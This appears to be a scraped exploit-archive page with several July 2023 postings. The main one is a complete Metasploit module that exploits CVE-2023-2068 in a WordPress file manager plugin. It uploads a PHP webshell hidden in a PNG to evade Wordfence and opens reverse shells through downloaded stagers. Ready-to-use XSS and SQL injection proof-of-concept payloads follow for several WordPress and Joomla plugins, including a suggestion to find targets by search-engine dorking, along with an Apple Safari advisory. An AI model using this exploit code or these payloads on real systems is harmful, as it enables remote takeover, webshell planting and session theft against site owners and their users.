WordPress File Manager Advanced Shortcode plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode. This leads to remote code execution in cases where the allowed MIME type list does not include PHP files. In the worst case, this is available to unauthenticated users, but it also works in an authenticated configuration. Versions 2.3.2 and below are affected. To install the Shortcode plugin File Manager Advanced version 5.0.5 or lower is required to keep the configuration vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system with the same privileges under which the Wordpress web services run.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::PhpPayloadPng  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode',        'Description' => %q{          The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.          This leads to RCE in cases where the allowed MIME type list does not include PHP files.          In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.          File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.          To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration          vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system          with the same privileges under which the Wordpress web services run.         },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Mateus Machado Tesser' # discovery        ],        'References' => [          ['CVE', '2023-2068'],          ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068'],          ['PACKETSTORM', '172707'],          ['WPVDB', '58f72953-56d2-4d86-a49b-311b5fc58056']        ],        'License' => MSF_LICENSE,        'Platform' => ['windows', 'unix', 'linux', 'php'],        'Privileged' => false,        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'Linemax' => 65535,              'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper,              'Linemax' => 3000,              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-05-31',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'File Manager Advanced (FMA) Shortcode URI path', '/']),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension php. Webshell name will be randomly generated if left unset.', nil        ]),        OptEnum.new('COMMAND',                    [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0])      ]    )  end  def get_form_data(png_webshell)    # construct multipart form data    form_data = Rex::MIME::Message.new    form_data.add_part('', nil, nil, 'form-data; name="reqid"')    form_data.add_part('upload', nil, nil, 'form-data; name="cmd"')    form_data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    form_data.add_part('fma_load_shortcode_fma_ui', nil, nil, 'form-data; name="action"')    form_data.add_part(@wp_data['fmakey'].to_s, nil, nil, 'form-data; name="_fmakey"')    form_data.add_part(@upload_path.to_s, nil, nil, 'form-data; name="path"')    form_data.add_part('', nil, nil, 'form-data; name="url"')    form_data.add_part('false', nil, nil, 'form-data; name="w"')    form_data.add_part('true', nil, nil, 'form-data; name="r"')    form_data.add_part('plugins', nil, nil, 'form-data; name="hide"')    form_data.add_part('upload,download', nil, nil, 'form-data; name="operations"')    form_data.add_part('inside', nil, nil, 'form-data; name="path_type"')    form_data.add_part('no', nil, nil, 'form-data; name="hide_path"')    form_data.add_part('no', nil, nil, 'form-data; name="enable_trash"')    form_data.add_part('image/png,text/x-php', nil, nil, 'form-data; name="upload_allow"')    form_data.add_part('2G', nil, nil, 'form-data; name="upload_max_size"')    form_data.add_part(png_webshell.to_s, 'image/png, text/x-php', 'binary', "form-data; name=\"upload[]\"; filename=\"#{@webshell_name}\"")    form_data.add_part('', nil, nil, 'form-data; name="mtime[]"')    return form_data  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : datastore['WEBSHELL'].to_s)    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    payload = if target['Type'] == :php                "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"              else                "<?=$_GET[\'#{@get_param}\'](base64_decode($_POST[\'#{@post_param}\']));?>"              end    # inject PHP payload into the PLTE chunk of the PNG image to bypass security such as Wordfence    png_webshell = inject_php_payload_png(payload, injection_method: 'PLTE')    if png_webshell.nil?      return false    end    # Upload payload in Wordpress root for execution    # try again at the configured upload directory if LFI fails    @upload_path = ''    no_break = true    loop do      form_data = get_form_data(png_webshell)      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri('/', @wp_data['baseurl'], 'wp-admin', 'admin-ajax.php'),        'ctype' => "multipart/form-data; boundary=#{form_data.bound}",        'data' => form_data.to_s      })      if res && res.code == 200 && !res.body.blank?        # parse json to find the webshell name embedded in the response at the "added" section that indicates a successful upload        res_json = res.get_json_document        return false if res_json.blank?        return true if res_json.dig('added', 0, 'name') == @webshell_name        # If we face an upload permission error, use the configured upload directory path to upload the payload        # We might not have execution rights there, but at least we can try ;-)        if res_json.dig('warning', 0) == 'errUploadFile' && res_json.dig('warning', 2) == 'errPerm' && no_break          @upload_path = @wp_data['path']          no_break = false        else          return false        end      else        return false      end    end  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/', @wp_data['baseurl'], @upload_path, @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = datastore['COMMAND']    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri('/', @wp_data['baseurl'], @upload_path, @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def check_fma_shortcode_plugin    # check if fma shortcode plugin is installed and return fmakey, upload directory path and Wordpress base url    @wp_data = {}    res = send_request_cgi!({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'])    })    if res && res.body && res.code == 200      # 1. Get the fmakey information by searching for strings:      # /_fmakey: '1555ef603c',/ or /_fmakey:'1555ef603c',/ or /"fmakey":"1555ef603c",/      fmakey_match1 = res.body.match(/_fmakey:.*'.*',/)      fmakey_match2 = res.body.match(/"fmakey":".*",/)      return if fmakey_match1.nil? && fmakey_match2.nil?      if fmakey_match1        @wp_data['fmakey'] = fmakey_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip      else        @wp_data['fmakey'] = fmakey_match2[0].split(',')[0].split(':')[1].tr('"', '').strip      end      # 2. Get the upload directory path information by searching for strings:      # /path: 'upload',/ or /path:'upload',/ or /"path":"upload",/      path_match1 = res.body.match(/path:.*'.*',/)      path_match2 = res.body.match(/"path":".*",/)      return if path_match1.nil? && path_match2.nil?      if path_match1        @wp_data['path'] = path_match1[0].split(',')[0].split(':')[1].tr('\'', '').strip      else        @wp_data['path'] = path_match2[0].split(',')[0].split(':')[1].tr('"', '').strip      end      # 3. Determine Wordpress baseurl      # search in html content for:      # <script src='http(s)://ip/<wp-base>/wp-content/plugins/file-manager-advanced-shortcode/js/shortcode.js?ver=6.2.2' id='fma-shortcode-js-js'></script>      # split off /wp-content and http(s)://ip part to determine the <wp-base> which can be empty.      baseurl_match = res.body.match(%r{src=.*wp-content/plugins/file-manager-advanced-shortcode/})      return if baseurl_match.nil?      @wp_data['baseurl'] = baseurl_match[0].split('/wp-content')[0].split('/')[3]    end  end  def check    return CheckCode::Safe('Server not online or not detected as WordPress.') unless wordpress_and_online?    check_fma_shortcode_plugin    return CheckCode::Safe("Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?    CheckCode::Appears("fmakey successfully retrieved: #{@wp_data['fmakey']}")  end  def exploit    # check if fmakey is already set from the check method otherwise try to find the key.    check_fma_shortcode_plugin unless datastore['AutoCheck']    fail_with(Failure::NotVulnerable, "Could not find fmakey. Shortcode plugin not installed or check your TARGETURI \"#{datastore['TARGETURI']}\" setting.") if @wp_data['fmakey'].nil?    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed.") unless upload_webshell    register_file_for_cleanup(@webshell_name.to_s)    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd, :windows_cmd      execute_command(payload.encoded)    when :linux_dropper, :windows_dropper      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

WordPress File Manager Advanced Shortcode 2.3.2 Remote Code Execution

WordPress WP Brutal AI plugin versions prior to 2.0.1 suffer from a cross site scripting vulnerability.

    Tittle:WordPress Plugin WP Brutal AI < 2.0.1 - Admin + Reflected XSSReferences:CVE-2023-2605Author:Taurus Omar Description:The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.Affects Plugins:WP Brutal AI- Fixed in version 2.0.0Proof of Concept:Send an HTTP request with the following:```POST https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 86Cookie: [Admin+]search=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&status=```Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/372cb940-71ba-4d19-b35a-ab15f8c2fdeb

WordPress WP Brutal AI Cross Site Scripting

WordPress WP Brutal AI plugin versions prior to 2.0.0 suffer from cross site request forgery and remote SQL injection vulnerabilities.

    Tittle:WordPress Plugin WP Brutal AI < 2.0.0 - SQL Injection via CSRFReferences:CVE-2023-2601Author:Taurus Omar Description:The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin via CSRF.Affects Plugins:WP Brutal AI - Fixed in version 2.0.0Proof of Concept:When there is a created campaign, access the following link as an admin:https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1+and+sleep%2815%29 Classification:Type SQLi OWASP top 10 A1: Sql Injection (SQLi)CWE-89wpScan:https://wpscan.com/vulnerability/57769468-3802-4985-bf5e-44ec1d59f5fd

WordPress WP Brutal AI Cross Site Request Forgery / SQL Injection

WordPress Tablesome plugin versions prior to 1.0.9 suffer from a cross site scripting vulnerability.

    Tittle:WordPress Plugin Tablesome < 1.0.9 - Reflected XSSReferences:CVE-2023-1890Author:Taurus Omar Description:The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site ScriptingAffects Plugins:Tablesome - Fixed in version 1.0.9Proof of Concept:Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yethttps://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3Ehttps://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script> Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d

WordPress Tablesome Cross Site Scripting

WordPress Login Configurator plugin version 2.1 and below suffer from a cross site scripting vulnerability.

    Tittle:WordPress Plugin Login Configurator <= 2.1 - Reflected Cross-Site ScriptingReferences:CVE-2023-1893Author:Taurus Omar Description:The plugin does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.Affects Plugins:Login Configurator - No known fix - plugin closedProof of Concept:Visit the following path:/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E#top  Classification:Type XSS OWASP top 10 A7: Cross-Site Scripting (XSS)CWE-79wpScan:https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7

WordPress Login Configurator 2.1 Cross Site Scripting

Joomla HikaShop extension version 4.7.4 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla HikaShop 4.7.4 - Reflected XSS# Exploit Author: CraCkEr# Date: 24/07/2023# Vendor: Hikari Software Team# Vendor Homepage: https://www.hikashop.com/# Software Link: https://demo.hikashop.com/index.php/en/# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/hikashop/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'from_option' is vulnerable to RXSShttps://website/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=[XSS]&from_ctrl=product&from_task=listing&from_itemid=103Path: /index.phpGET parameter 'from_ctrl' is vulnerable to RXSShttps://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=[XSS]&from_task=listing&from_itemid=103Path: /index.phpGET parameter 'from_task' is vulnerable to RXSShttps://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=[XSS]&from_itemid=103Path: /index.phpGET parameter 'from_itemid' is vulnerable to RXSShttps://demo.hikashop.com/index.php?option=com_hikashop&ctrl=product&task=filter&tmpl=raw&filter=1&module_id=102&cid=2&from_option=com_hikashop&from_ctrl=product&from_task=listing&from_itemid=[XSS][XSS Payload]: uhqum"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"wcn46[-] Done

Joomla HikaShop 4.7.4 Cross Site Scripting

Apple Security Advisory 2023-07-24-1 - Safari 16.6 addresses bypass and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-1 Safari 16.6

Safari 16.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213847.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit Process Model  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

WebKit Web Inspector  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Additional recognition

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

Safari 16.6 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLUACgkQ4RjMIDke  
NxmswA/+Ogpb238ypqmIxTWos/b/TTV2uTnDHQHuKGVBMiVy0Rh+3Cnu2GTTSLiC  
bYh2hWCXP3jarhE3/dosv7AhtYvDHYgh0fCbVCRn43rTGVMpJGSAZ3NzyfD76fPQ  
4XlaGZuf9326GGXq9lY00Ga98zA0Hf40JJzVpYXgoLopmVml8lgRyJSN1EVjXPJR  
fKJSe0y/aKHmH1qAIyVG4Q0qMVTamRCUmZwSp++UZ/gwg2E3qBTT30voPmvw1onW  
uRMdUXyh+K74/O7nan6P5z/WHuUAdRX6Hpjr7IvNcasm/KPEBOfj4lx1YwWJ592E  
F0o+d2k7awPElXMfsGTewW1HynJuis57AN808XOYjBCd+pKKlQq6NdKun87d3zxr  
RjmDdh4Yoqs3aaDckRYk8arq4g0/mKn9wSiVXwvoYC5YBePR8CQxzdP98gAqhjQM  
y9w1xPyb0Y5qCNPhPw4dk7OSrLI3y8Z+BWdMc/TIO+GOHYMdM4BtUoZ/M5T3Nqgb  
++EAggF5ajSJXmHNEVS5zLDcuP+HSYqQphqc8y6WMmWHM8tLA53OWiTDMSHP5n0x  
OFdgAYgegvc2dDbhDjVMAaVJuWqMKtsnIO//1+9ffBk4QSkQUZwGk3ybO+r27V4a  
1NzO/xMvepp/ZHj+R7j+bE4KVw6bPX43agaE+00WMMx+TqVXa4c=  
=RW2J  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-1

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

Posted Jul 25, 2023

Authored by indoushka

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9

Download | Favorite | View

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,749)
*   Arbitrary (16,156)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,240)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,335)
*   DoS (23,366)
*   Encryption (2,365)
*   Exploit (51,659)
*   File Inclusion (4,213)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,756)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,644)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,139)
*   Proof of Concept (2,338)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,674)
*   Root (3,576)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,877)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,312)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,716)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,879)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,995)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,251)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,603)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,760)
*   UNIX (9,270)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting

WordPress Page Builder KingComposer plugin version 2.8.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.8.1 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>[+] http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.8.1 Cross Site Scripting

A vulnerability classified as problematic has been found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/edit-accepted-appointment.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235251.

Tag

#php